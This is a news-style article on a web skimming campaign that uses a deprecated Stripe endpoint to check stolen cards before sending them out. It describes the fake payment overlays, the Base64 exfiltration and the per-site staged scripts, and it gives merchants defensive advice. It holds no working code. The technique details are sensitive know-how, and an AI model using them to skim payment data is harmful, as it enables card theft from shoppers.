Dozens of online merchants are falling victim to a sophisticated skimming scheme that’s exploiting a legacy Stripe API. Since August 2024, attackers have been leveraging the deprecated “api.stripe[.]com/v1/sources” endpoint to validate stolen payment information before exfiltration. Smart move. Why waste time with invalid card data, right?
The campaign has already compromised approximately 49 e-commerce sites, with only 15 managing to remove the malicious code. The rest? Still leaking customer data like a sieve. These attacks specifically target vulnerabilities in popular platforms like WooCommerce, WordPress, and PrestaShop.
Here’s how it works: JavaScript skimmers inject code that intercepts legitimate payment forms. They hide the real Stripe iframe and overlay it with a convincing fake. Customers enter their details, none the wiser. The skimmer validates the card data through the legacy API and sends only the good stuff to attackers’ servers in Base64-encoded format. Efficient. Ruthless.
What makes detection so challenging is how these scripts blend in. They mimic legitimate code and unfold in multiple stages. Static analysis tools? Often useless against dynamic code evaluation and obfuscation techniques. The attackers are even expanding their horizons, with evidence showing they’re now targeting Square payment forms and adding cryptocurrency payment options. The malicious scripts actively perform real-time exfiltration of customer payment details as they’re entered. Small businesses are particularly vulnerable due to their limited security resources compared to larger organizations.
The implications are serious. Small and large businesses alike are affected, and many don’t even realize they’ve been compromised. The attackers’ use of legitimate APIs makes the malicious activity appear normal in logs. Attackers customize Stage 3 skimmer scripts specifically for each targeted website using the Referrer header. It’s like finding a needle in a digital haystack.
For merchants, the solution isn’t complicated, just inconvenient: shift to updated APIs, audit third-party scripts regularly, implement Content Security Policies, and deactivate unused services. Basic cybersecurity hygiene, really.
But until more sites wake up to the threat, customers’ card data will continue flowing straight into criminals’ hands. Just another day in e-commerce.
